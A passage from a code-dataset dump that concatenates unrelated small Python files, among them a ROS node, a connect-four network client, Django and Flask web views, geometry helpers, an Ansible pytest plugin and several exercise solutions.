listener():\n\n rospy.init_node('node3', anonymous=True)\n\n rospy.Subscriber('team_abhiyaan', String, callback1)\n rospy.Subscriber('autonomy', String, callback2)\n\nif __name__ == '__main__':\n listener()\n","sub_path":"workspace/src/abhiyaan/scripts/node3.py","file_name":"node3.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645481276","text":"__author__ = 'Ryan'\nimport FBB_League\nfrom Scrape_espn_league import *\nimport pandas as pd\nimport pickle\nimport numpy as np\n\ndef main():\n # NCB = FBB_League.FBB_League('123478', '2015')\n #updateLeague(NCB)\n #NCB = updateLeague(NCB)\n #with open('NCB.pickle', 'wb') as handle:\n # pickle.dump(NCB, handle)\n #with open('NCB.pickle', 'rb') as handle:\n # NCB = pickle.load(handle)\n\n with open('NCB.pickle', 'rb') as handle:\n NCB = pickle.load(handle)\n NCB = updateLeague(NCB)\n NCB.createELO()\n NCB.analyizeLastWeek()\n NCB.predictThisWeek()\n # with open('NCB.pickle', 'wb') as handle:\n # pickle.dump(NCB, handle)\n\n\n\n\n \"\"\"\n ELO = NCB.getELO()\n ELO = ELO.sort('ELO', ascending=False)\n print(ELO.loc[:, ['Name', 'ELO']])\n\n with open('NCB.pickle', 'wb') as handle:\n pickle.dump(NCB, handle)\n\n with open('NCB.pickle', 'rb') as handle:\n NCB = pickle.load(handle)\n projections = NCB.projectTeams()\n projections.sort('Zscore', ascending=True, inplace=True)\n print(projections)\n print('\\n\\n\\n')\n with open('NCB.pickle', 'wb') as handle:\n pickle.dump(NCB, handle)\n \"\"\"\n \"\"\"\n NCB = FBB_League.FBB_League('123478', '2015')\n hitters = pd.read_csv('Data/Hitters_projections.csv', index_col=0)\n pitchers = pd.read_csv('Data/Pitchers_projections.csv', index_col=0)\n teams = pd.read_csv('Data/NCB_teams.csv', index_col=0)\n\n NCB.setBatterProjections(hitters)\n NCB.setPitcherProjections(pitchers)\n NCB.setTeams(teams)\n ARB, ARP = scrapeTeamPlayers('123478', '2015', teams)\n NCB.setBatterRosters(ARB)\n NCB.setPitcherRosters(ARP)\n NCB.calculateBatterZScores()\n NCB.calcualtePitcherZScores()\n NCB.getBatterProjections().to_csv('Data/new_Bprojectections.csv')\n NCB.getPitcherProjections().to_csv('Data/new_Pprojectections.csv')\n\n with open('NCB.pickle', 'wb') as handle:\n pickle.dump(NCB, handle)\n\n ARB, ARP = scrapeTeamPlayers('123478', '2015', NCB.getTeams())\n NCB.setBatterRosters(ARB)\n NCB.setPitcherRosters(ARP)\n curHitters, curPitchers = scrapePlayerSeason('123478', '2015')\n NCB.setHitters(curHitters)\n NCB.setPitchers(curPitchers)\n projections = NCB.projectTeams()\n projections.sort('Zscore', ascending=True, inplace=True)\n \"\"\"\n\n\ndef updateLeague(league):\n Scrape = ESPN_Scrape()\n hitters = pd.read_csv('Data/Hitter_projections.csv', index_col=0)\n pitchers = pd.read_csv('Data/Pitcher_projections.csv', index_col=0)\n teams = Scrape.scrapeLeagueTeams(league.getLeagueId(), league.getYear())\n matchups = Scrape.scrapeMatchupResults(league.getLeagueId(), league.getYear())\n ARB, ARP = Scrape.scrapeTeamPlayers(league.getLeagueId(), league.getYear(), teams)\n curHitters, curPitchers = Scrape.scrapePlayerSeason(league.getLeagueId(), league.getYear())\n matchupBatters, matchupPitchers = Scrape.scrapeMatchupPlayers(league.getLeagueId(), league.getYear())\n schedule = Scrape.scrapeLeagueSchedule(league.getLeagueId(), league.getYear())\n weekIds = pd.read_csv('Data/weekId.csv', index_col=0)\n\n week = Scrape.currentWeek()\n\n league.setSchedule(schedule)\n league.setCurrentWeekId(week)\n league.setBatterProjections(hitters)\n 
league.setPitcherProjections(pitchers)\n league.setTeams(teams)\n league.setBatterRosters(ARB)\n league.setPitcherRosters(ARP)\n league.setBatters(curHitters)\n league.setPitchers(curPitchers)\n league.setMatchUpResults(matchups)\n league.setMatchUpBatters(matchupBatters)\n league.setMatchUpPitchers(matchupPitchers)\n league.setLeagueScheduleDates(weekIds)\n return league\nmain()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559616136","text":"import os\n\nfrom ivutils.base import file_ops\nimport jinja2\n\nTHIS_FILE = os.path.normpath(\n os.path.abspath(__file__)\n)\nFILES_ROOT = os.path.dirname(THIS_FILE)\n\nTESTFILE='testfile'\n\npackaged_files = file_ops.MultiRootFilesLocator(roots=[FILES_ROOT])\n\njinja_env = jinja2.Environment(\n loader=jinja2.FileSystemLoader(searchpath=FILES_ROOT)\n)\n","sub_path":"ivutils/files/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193217987","text":"import connectfour\nimport connectfour_similar\nimport connectfour_sockets\nimport socket\n\n\ndef get_username():\n '''' get username from user'''\n username=\"\"\n username = input(\"Enter username: \").strip()\n return username\n\ndef send_username(connection):\n ''' send username to server protocol and disconnect if username not correct input'''\n response=get_username()\n if \" \" in response or response==\"\":\n print(\"You're not playing by the rules\")\n return\n response = 'I32CFSP_HELLO '+ response\n\n connectfour_sockets.send_message(connection, response)\n response = connectfour_sockets.receive_response(connection)\n if \"WELCOME\" not in response:\n print(\"Not connected to ICS 32 CONNECTFOUR SERVER PROTOCOL\")\n exit()\n return response\n\ndef handle_commands(response,connection,gamestate):\n ''' continues game between user and AI until winner'''\n if response==\"READY\":\n connectfour_similar.player(gamestate)\n user_inp= connectfour_similar.user_input(gamestate)\n send_response = user_inp[0] +\" \"+ str(user_inp[1])\n connectfour_sockets.send_message(connection,send_response)\n gamestate = connectfour_similar.drop_or_pop(gamestate, user_inp)\n response=(connectfour_sockets.receive_response(connection))\n return response,connection,gamestate\n\n if response==\"INVALID\": #Handling Invalid inputs\n gamestate=gamestate\n print(response)\n print(\"ERROR. 
Try again\")\n response=connectfour_sockets.receive_response(connection)\n return response,connection,gamestate\n\n while (response.strip()!=\"READY\"):\n resp=response[:4].strip()\n if(resp in [\"DROP\", \"POP\"]):\n connectfour_similar.player(gamestate)\n gamestate = connectfour_similar.drop_or_pop(gamestate, response.split())\n connectfour_similar.print_board(gamestate.board)\n return response,connection,gamestate\n\n\ndef connect():\n ''' connects host and port '''\n host = connectfour_sockets.read_host()\n port = connectfour_sockets.read_port()\n try:\n connection = connectfour_sockets.connect(host, port)\n return connection\n except socket.gaierror:\n print(\"TRYING TO CONNECT TO A SERVER WITH INVALID HOSTNAME OR PORT\")\n #exit()\n return\n\ndef winner(response):\n ''' prints winner of the game '''\n if(response==\"WINNER_RED\"):\n print(\"RED IS THE WINNER OF THIS GAME\")\n elif(response==\"WINNER_YELLOW\"):\n print(\"YELLOW IS THE WINNER OF THIS GAME\")\n\ndef userinterface():\n '''main user interface that calls functions '''\n connection=connect()\n if connection is None:\n return\n\n response=send_username(connection)\n if response is None:\n return\n\n print(response)\n connectfour_sockets.send_message(connection,\"AI_GAME\")\n gamestate = connectfour.new_game()\n\n connectfour_similar.print_board(gamestate[0])\n response=connectfour_sockets.receive_response(connection)\n\n while response[:6]!=\"WINNER\":\n output = handle_commands(response,connection,gamestate)\n response = output[0]\n response=(connectfour_sockets.receive_response(connection))\n connection = output[1]\n gamestate = output[2]\n if response[:6]==\"WINNER\":\n winner(response)\n connectfour_sockets.close(connection)\n return\n\n\nif __name__ == '__main__':\n userinterface()\n","sub_path":"lab2-32/connectfour_network_ui.py","file_name":"connectfour_network_ui.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"374618467","text":"#!/usr/bin/env python3\n\n\"\"\"Main.\"\"\"\n\nimport sys\nfrom cpu import *\n\nfilename = './examples/print8.ls8'\nif len(sys.argv) > 1: filename = sys.argv[1]\ncpu = CPU()\n\nif filename is not None:\n cpu.load(filename)\n cpu.run()","sub_path":"ls8/ls8.py","file_name":"ls8.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397082653","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/9/30 4:49 PM\n# @Author : zhongch4g\n# @Site : \n# @File : 132. Palindrome Partitioning II.py\n# @Software: IntelliJ IDEA\n\n\nimport sys\nclass Solution:\n def minCut(self, s: str) -> int:\n length = len(s)\n if length == 0:\n return 0\n is_palin = [[False] * length for i in range(length)]\n\n for c in range(length - 1):\n # even\n i, j = c, c + 1\n while i >= 0 and j < length and s[i] == s[j]:\n is_palin[i][j] = True\n i -= 1\n j += 1\n\n for o in range(length):\n # odd\n i, j = o, o\n while i >= 0 and j < length and s[i] == s[j]:\n is_palin[i][j] = True\n i -= 1\n j += 1\n\n mincut = [0 for i in range(length + 1)]\n for i in range(1, length + 1):\n mincut[i] = sys.maxsize\n for j in range(i):\n if is_palin[j][i - 1]:\n mincut[i] = min(mincut[i], mincut[j] + 1)\n # Attention: Cut how many times, not how many palindrome\n return mincut[length] - 1\n","sub_path":"LeetCode/132. Palindrome Partitioning II.py","file_name":"132. 
Palindrome Partitioning II.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"212207489","text":"\"\"\"Enable unit testing of Ansible collections. PYTEST_DONT_REWRITE\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport os\n\n# set by ansible-test to a single directory, rather than a list of directories as supported by Ansible itself\nANSIBLE_COLLECTIONS_PATH = os.path.join(os.environ['ANSIBLE_COLLECTIONS_PATH'], 'ansible_collections')\n\n\n# this monkeypatch to _pytest.pathlib.resolve_package_path fixes PEP420 resolution for collections in pytest >= 6.0.0\n# NB: this code should never run under py2\ndef collection_resolve_package_path(path):\n \"\"\"Configure the Python package path so that pytest can find our collections.\"\"\"\n for parent in path.parents:\n if str(parent) == ANSIBLE_COLLECTIONS_PATH:\n return parent\n\n raise Exception('File \"%s\" not found in collection path \"%s\".' % (path, ANSIBLE_COLLECTIONS_PATH))\n\n\n# this monkeypatch to py.path.local.LocalPath.pypkgpath fixes PEP420 resolution for collections in pytest < 6.0.0\ndef collection_pypkgpath(self):\n \"\"\"Configure the Python package path so that pytest can find our collections.\"\"\"\n for parent in self.parts(reverse=True):\n if str(parent) == ANSIBLE_COLLECTIONS_PATH:\n return parent\n\n raise Exception('File \"%s\" not found in collection path \"%s\".' % (self.strpath, ANSIBLE_COLLECTIONS_PATH))\n\n\ndef pytest_configure():\n \"\"\"Configure this pytest plugin.\"\"\"\n try:\n if pytest_configure.executed:\n return\n except AttributeError:\n pytest_configure.executed = True\n\n # noinspection PyProtectedMember\n from ansible.utils.collection_loader._collection_finder import _AnsibleCollectionFinder\n\n # allow unit tests to import code from collections\n\n # noinspection PyProtectedMember\n _AnsibleCollectionFinder(paths=[os.path.dirname(ANSIBLE_COLLECTIONS_PATH)])._install() # pylint: disable=protected-access\n\n try:\n # noinspection PyProtectedMember\n from _pytest import pathlib as _pytest_pathlib\n except ImportError:\n _pytest_pathlib = None\n\n if hasattr(_pytest_pathlib, 'resolve_package_path'):\n _pytest_pathlib.resolve_package_path = collection_resolve_package_path\n else:\n # looks like pytest <= 6.0.0, use the old hack against py.path\n # noinspection PyProtectedMember\n import py._path.local\n\n # force collections unit tests to be loaded with the ansible_collections namespace\n # original idea from https://stackoverflow.com/questions/50174130/how-do-i-pytest-a-project-using-pep-420-namespace-packages/50175552#50175552\n # noinspection PyProtectedMember\n py._path.local.LocalPath.pypkgpath = collection_pypkgpath # pylint: disable=protected-access\n\n\npytest_configure()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_test/_data/pytest/plugins/ansible_pytest_collections.py","file_name":"ansible_pytest_collections.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"520227176","text":"from django.conf import settings\nfrom django.urls import include, path\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.views import defaults as default_views\n\nurlpatterns = [\n path(r\"\", TemplateView.as_view(template_name=\"pages/home.html\"), 
name=\"home\"),\n path(r\"about/\", TemplateView.as_view(template_name=\"pages/about.html\"), name=\"about\"),\n # Django Admin, use {% url 'admin:index' %}\n path(settings.ADMIN_URL, admin.site.urls),\n # User management\n path(r\"accounts/\", include(\"allauth.urls\")),\n # Your stuff: custom urls includes go here\n path(r'ckeditor/', include('ckeditor_uploader.urls')),\n\n path(r'blogs/', include(('articles.blogs.urls', 'articles.blogs'), namespace='blogs')),\n] + static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n)\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n path(r\"400/\", default_views.bad_request, kwargs={\"exception\": Exception(\"Bad Request!\")},),\n path(r\"403/\", default_views.permission_denied, kwargs={\"exception\": Exception(\"Permission Denied\")},),\n path(r\"404/\", default_views.page_not_found, kwargs={\"exception\": Exception(\"Page not Found\")},),\n path(r\"500/\", default_views.server_error),\n ]\n if \"debug_toolbar\" in settings.INSTALLED_APPS:\n import debug_toolbar\n\n urlpatterns = [path(r\"__debug__/\", include(debug_toolbar.urls))] + urlpatterns\n","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"625793919","text":"from __future__ import division\n'''\nContains the most common geometric operations on points, \nsegments and lines. \nPoints are represented as (x,y)\nSegments are represented as (x1,y1,x2,y2)\nLines are represented as (a,b,c), where ax+by+c=0 is the \nequation of the line.\n\nContains the following operations:\n Getting a line from two points\n Getting intersection between pairs of lines or segments\n Getting the closest point on a line or segment to a point\n Getting distance from a point to a point, segment or line\n Finding out if a point is on a segment or not.\n\nTime Complexity: O(1)\nSpace Complexity: O(1)\n'''\n#Returns a line from two points.\ndef two_points_to_line(x1,y1,x2,y2):\n return (y2-y1,x1-x2,x2*y1-y2*x1)\n\n#Returns the intersection between the lines.\n#Assumes the lines have either a or b different from 0.\ndef line_line_intersect(line1,line2):\n a1,b1,c1 = line1\n a2,b2,c2 = line2\n cp = a1*b2 - a2*b1\n if cp!=0:\n return ((b1*c2-b2*c1)/cp,(a2*c1-a1*c2)/cp)\n else:\n if a1*c2==a2*c1 and b1*c2==b2*c1:\n return line1\n return None\n\n#Returns the intersection between two segments.\n#Assumes the segments have length > 0.\n#Return value is None, a point or a segment. 
\ndef seg_seg_intersect(seg1,seg2):\n line1=two_points_to_line(*seg1)\n line2=two_points_to_line(*seg2)\n p=line_line_intersect(line1,line2)\n if p == None: return None\n if len(p)==2:\n if weak_point_on_seg(seg1,p) and weak_point_on_seg(seg2,p):\n return p\n return None\n pts = [(seg1[0],seg1[1],0), (seg1[2],seg1[3],0), \n (seg2[0],seg2[1],1), (seg2[2],seg2[3],1)]\n pts.sort()\n if pts[1][0] == pts[2][0] and pts[1][1] == pts[2][1]\\\n and pts[1][2] != pts[2][2]:\n return (pts[1][0],pts[1][1])\n if pts[0][2] != pts[1][2]:\n return (pts[1][0],pts[1][1],pts[2][0],pts[2][1])\n return None\n\n#Returns the point on the segment closest to p.\ndef seg_point_project(seg, p):\n line = two_points_to_line(*seg)\n p2 = line_point_project(line,p)\n if weak_point_on_segment(seg,p2):\n return p2\n else:\n if dist(p,(seg[0],seg[1])) < dist(p,(seg[2],seg[3])):\n return (seg[0],seg[1])\n else:\n return (seg[2],seg[3])\n\n#Returns the orthogonal projection of a point onto a line.\ndef line_point_project(line, p):\n a,b,c=line\n x,y=p\n return ((b*(b*x-a*y)-a*c)/(a**2+b**2),\n (a*(-b*x+a*y)-b*c)/(a**2+b**2))\n\n#Returns the euclidean distance between two points.\ndef dist(p1,p2):\n return ((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)**0.5\n\n#Returns the distance from a point to a segment.\ndef seg_point_dist(seg,p):\n p2 = seg_point_project(seg,p)\n return dist(p,p2)\n\n#Returns the distance from a point to a line.\ndef line_point_dist(line,p):\n p2 = line_point_project(line, p)\n return dist(p,p2)\n\n#Returns if point p is on segment seg.\ndef point_on_seg(seg,p):\n x,y = p\n x1,y1,x2,y2 = seg \n if (x-x1)*(y-y2) == (x-x2)*(y-y1):\n return (x-x1)*(x-x2) <= 0 and (y-y1)*(y-y2) <= 0\n return False\n\n#Only checks that the order of the points is correct.\ndef weak_point_on_seg(seg,p):\n x,y = p\n x1,y1,x2,y2 = seg \n return (x-x1)*(x-x2) <= 0 and (y-y1)*(y-y2) <= 0\n","sub_path":"code/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"452781722","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n\n\nwith open('README.rst') as f:\n long_description = f.read()\n\nsetup(\n name='dj-email-url',\n version='0.1.0',\n url='https://github.com/migonzalvar/dj-email-url',\n license='BSD',\n author='Miguel Gonzalez',\n author_email='migonzalvar@gmail.com',\n description='Use an URL to configure email backend settings in your '\n 'Django Application.',\n long_description=long_description,\n py_modules=['dj_email_url'],\n zip_safe=False,\n include_package_data=True,\n platforms='any',\n classifiers=[\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"124195179","text":"import matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nfrom pylab import mpl\n\n# Shell: `fc-list :lang=zh-cn`\nfont_1 = FontProperties(\n\tfname=\"/System/Library/Fonts/Supplemental/Songti.ttc\",\n\tweight='light', style='normal', size=15)\nfont_2 = 
FontProperties(\n\tfname=\"/System/Library/Fonts/Supplemental/Courier New Bold.ttf\",\n\tweight='bold', style='normal', size=11)\nfig, ax = plt.subplots()\nmpl.rcParams['axes.unicode_minus'] = False\ntemperature_min = [14, 12, 15, 17, 18, 17, 5, 4, 6, 6, 5, 4, 9, 9, 8]\ntemperature_max = [23, 21, 21, 21, 19, 20, 23,7,12,14,16,17,17,20,17]\ndate_x = list(range(len(temperature_min)))\nplt.ylim([3, 24])\nplt.plot(date_x, temperature_min, label=\"最低温度\", color=\"#1D4E89\", linewidth=2)\nplt.plot(date_x, temperature_max, label=\"最高温度\", color=\"#DB5461\", linewidth=2)\nplt.plot([7, 7], [3, 24], linestyle='--', color='black', linewidth=1)\nplt.annotate(\"今天\", (7, 7), xycoords='data', xytext=(9, 9), arrowprops=dict(arrowstyle='->', connectionstyle=\"angle3\"), fontproperties=font_1)\nplt.xticks(date_x, [f\"11-{x + 1:02d}\" for x in date_x])\nfor tick in ax.get_xticklabels():\n tick.set_rotation(40)\n tick.set_font_properties(font_2)\nfor tick in ax.get_yticklabels():\n\ttick.set_font_properties(font_2)\nplt.text(date_x[-1] + 1, 2, '日期', fontproperties=font_1)\nplt.text(-2, 25, '温度/℃', fontproperties=font_1)\nplt.legend(prop=font_1)\nplt.grid()\nplt.show()","sub_path":"code/Matplotlib/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"487291510","text":"import pygame\nimport random\nimport math\n\n\nclass Ball:\n \"\"\"A class to represent the ball.\"\"\"\n def __init__(self, settings, screen):\n self.screen = screen\n self.settings = settings\n\n self.image = pygame.image.load('images/ball.png')\n self.rect = self.image.get_rect()\n\n # Start each ball in the middle of the net\n self.rect.x = self.settings.screen_width / 2 - self.rect.width / 2\n self.rect.y = self.settings.screen_height / 2 - self.rect.width / 2\n\n # Store the ball's exact position.\n self.x = float(self.rect.x)\n self.y = float(self.rect.y)\n\n # Creates random number to use for launch angle\n self.randomnum = random.randint(1, 100) / 100\n self.angle = 360 * self.randomnum\n\n def update(self):\n \"\"\"Move the ball using a random launch angle.\"\"\"\n self.x -= (self.settings.ball_speed * self.settings.ball_directionx * math.cos(self.angle))\n self.y -= (self.settings.ball_speed * self.settings.ball_directiony * math.sin(self.angle))\n self.rect.x = self.x\n self.rect.y = self.y\n\n def blitme(self):\n \"\"\"Draw the ball at its current location.\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def reflectx(self):\n \"\"\"Reflect the ball's x direction\"\"\"\n self.settings.ball_directionx *= -1\n\n def reflecty(self):\n \"\"\"Reflect the ball's y direction\"\"\"\n self.settings.ball_directiony *= -1\n\n def reset_ball(self):\n \"\"\"Reset the ball back to the middle, make a new launch direction\"\"\"\n self.x = self.settings.screen_width / 2 - self.rect.width / 2\n self.y = self.settings.screen_height / 2 - self.rect.width / 2\n self.randomnum = random.randint(1, 100) / 100\n self.angle = 360 * self.randomnum\n self.settings.ball_speed = .4\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"564068578","text":"from autumn.calibration import (\n Calibration,\n run_full_models_for_mcmc as _run_full_models_for_mcmc,\n)\nfrom autumn.tool_kit.utils import find_first_index_reaching_cumulative_sum\n\nfrom ..app import RegionApp\n\nfrom numpy import linspace\n\nN_ITERS = 
100000\nN_BURNED = 0\nN_CHAINS = 1\n\n\ndef run_full_models_for_mcmc(region: str, burn_in: int, src_db_path: str, dest_db_path: str):\n \"\"\"\n Run the full baseline model and all scenarios for all accepted MCMC runs in src db.\n \"\"\"\n region_model = RegionApp(region)\n build_model = region_model.build_model\n params = region_model.params\n _run_full_models_for_mcmc(burn_in, src_db_path, dest_db_path, build_model, params)\n\n\ndef run_calibration_chain(\n max_seconds: int,\n run_id: int,\n region: str,\n par_priors,\n target_outputs,\n mode=\"autumn_mcmc\",\n _grid_info=None,\n _multipliers={},\n):\n \"\"\"\n Run a calibration chain for the covid model\n\n num_iters: Maximum number of iterations to run.\n available_time: Maximum time, in seconds, to run the calibration.\n mode is either 'lsm' or 'autumn_mcmc'\n \"\"\"\n print(f\"Preparing to run DR-TB model calibration for region {region}\")\n\n region_model = RegionApp(region)\n build_model = region_model.build_model\n params = region_model.params\n calib = Calibration(\n \"dr_tb_malancha\",\n build_model,\n params,\n par_priors,\n target_outputs,\n _multipliers,\n run_id,\n total_nb_chains=1,\n param_set_name=region,\n )\n print(\"Starting calibration.\")\n calib.run_fitting_algorithm(\n run_mode=mode,\n n_iterations=N_ITERS,\n n_burned=N_BURNED,\n n_chains=N_CHAINS,\n available_time=max_seconds,\n grid_info=_grid_info,\n )\n print(f\"Finished calibration for run {run_id}.\")\n","sub_path":"apps/dr_tb_malancha/calibration/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"641436854","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport unittest\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport analyzer.shared.text_utility as util\n\n\nclass TestTextUtility(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_get_text_eliminated_some_pattern_words(self):\n testcase_sources = [\n (\"@hoge moge\", \"moge\"),\n (\"http://localhost moge\", \"moge\"),\n (\"http://localhost\\nmoge\", \"\\nmoge\"),\n (\"#hoge moge\", \"moge\"),\n (\"#hoge\\nmoge\", \"\\nmoge\"),\n (\"あいうABCDEF1234えお\", \"あいうえお\"),\n (\"あいうABCDEF12えお\", \"あいうえお\"),\n ]\n for source, expected in testcase_sources:\n with self.subTest(source=source, expected=expected):\n eliminated_text = util.get_text_eliminated_some_pattern_words(source)\n self.assertEqual(eliminated_text, expected)\n\n def test_get_nps_printid(self):\n testcase_sources = [\n (\"あいうえお\", []),\n # 10桁の予約番号は除外される\n (\"あいうABCDEF1234えお\", []),\n (\"あいうABCDEF12えお\", [\"ABCDEF12\"]),\n (\"あいうABCDEF12えおABCDEF12\", [\"ABCDEF12\", \"ABCDEF12\"])\n ]\n for source, expected in testcase_sources:\n with self.subTest(source=source, expected=expected):\n nps_id = util.get_nps_printid(source)\n self.assertEqual(nps_id, expected)\n\n def test_get_eliminated_text(self):\n testcase_sources = [\n (\"あいうABCDEF12えお\", \"あいうえお\"),\n (\"あいうえお\", \"あいうえお\")\n ]\n for source, expected in testcase_sources:\n with self.subTest(source=source, expected=expected):\n eliminated_text = util.get_eliminated_text(util.NPS_ID_PATTERN, source)\n self.assertEqual(eliminated_text, expected)\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"tests/test_text_utility.py","file_name":"test_text_utility.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137428012","text":"import datetime\n\nfrom flask import Blueprint, render_template, session, request, jsonify\n\nfrom App.models import House, Order\nfrom utils import status_code\nfrom utils.middleware import is_login\n\norder_blueprint = Blueprint('order', __name__)\n\n\n@order_blueprint.route('/book_house/', methods=['GET'])\n@is_login\ndef book_house():\n \"\"\"\n Render the booking page\n \"\"\"\n return render_template('booking.html')\n\n\n@order_blueprint.route('/orders/', methods=['GET'])\n@is_login\ndef orders():\n \"\"\"\n Render the order-placing page\n \"\"\"\n return render_template('orders.html')\n\n\n@order_blueprint.route('/get_order/<int:id>/', methods=['POST'])\n@is_login\ndef get_order(id):\n \"\"\"\n Submit my order\n \"\"\"\n user_id = session['user_id']\n begin_date = datetime.datetime.strptime(request.form.get('start_date'), '%Y-%m-%d')\n end_date = datetime.datetime.strptime(request.form.get('end_date'), '%Y-%m-%d')\n times = end_date - begin_date\n days = times.days + 1\n house = House.query.get(id)\n price = house.price\n amount = days * price\n order = Order()\n order.user_id = user_id\n order.house_id = id\n order.begin_date = begin_date\n order.end_date = end_date\n order.days = days\n order.house_price = price\n order.amount = amount\n order.add_update()\n\n return jsonify(code=status_code.OK)\n\n\n@order_blueprint.route('/my_orders/', methods=['GET'])\n@is_login\ndef my_orders():\n \"\"\"\n Render the my-orders page\n \"\"\"\n return render_template('orders.html')\n\n\n@order_blueprint.route('/show_my_orders/', methods=['GET'])\n@is_login\ndef show_my_orders():\n \"\"\"\n Show the details of my orders\n \"\"\"\n my_orders = Order.query.filter(Order.user_id == session['user_id'])\n orders_info = [my_order.to_dict() for my_order in my_orders]\n return jsonify(code=status_code.OK, orders_info=orders_info)\n\n\n@order_blueprint.route('/custom_orders/', methods=['GET'])\n@is_login\ndef custom_orders():\n \"\"\"\n Render the customer-orders page\n \"\"\"\n return render_template('custom_orders.html')\n\n\n@order_blueprint.route('/show_custom_orders/', methods=['GET'])\n@is_login\ndef show_custom_orders():\n \"\"\"\n Show the details of customer orders\n \"\"\"\n user_id = session['user_id']\n houses = House.query.filter(House.user_id == user_id)\n houses_ids = [house.id for house in houses]\n custom_orders = Order.query.filter(Order.house_id.in_(houses_ids)).all()\n custom_orders_info = [custom_order.to_dict() for custom_order in custom_orders]\n return jsonify(code=status_code.OK, custom_orders_info=custom_orders_info)\n\n\n@order_blueprint.route('/accept_order/', methods=['PATCH'])\n@is_login\ndef accept_order():\n order_id = request.form.get('order_id')\n\n order = Order.query.get(order_id)\n order.status = 'WAIT_PAYMENT'\n order.add_update()\n return jsonify(code=200)\n\n\n@order_blueprint.route('/refuse_order/', methods=['PATCH'])\n@is_login\ndef refuse_order():\n order_id = request.form.get('order_id')\n\n reject_reason = request.form.get('reject_reason')\n order = Order.query.get(order_id)\n order.status = 'REJECTED'\n order.comment = reject_reason\n order.add_update()\n return jsonify(code=200)","sub_path":"aijia/App/order_views.py","file_name":"order_views.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"282669995","text":"'''\nTask: \nRead two integers and print 
two lines. The first line should contain integer division, a//b . The second line should contain float division, a/b .\n\nYou don't need to perform any rounding or formatting operations.\n\nInput Format:\nThe first line contains the first integer, a. The second line contains the second integer, b.\n\nOutput Format:\nPrint the two lines as described above.\n\nTask 1. get user input\nTask 2. convert inputs to int\nTask 3. test if conversion is successful\nTask 4. divide and print, twice\n'''\n\ndef divide_two_ways():\n # Task 2\n try:\n # Task 1 and 3\n a = int(input())\n b = int(input())\n # Task 4\n print(a//b)\n print(a/b)\n # python 3 allows float answers by dividing two integers. If it didn't, I could convert one of the inputs to a float type to get a float answer on float division. \n except ValueError:\n divide_two_ways()\n\ndivide_two_ways()","sub_path":"hackerrank/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264029634","text":"from flask import Flask,render_template,jsonify,request\r\nfrom flask_bootstrap import Bootstrap\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom sqlalchemy import or_\r\n\r\n\r\napp = 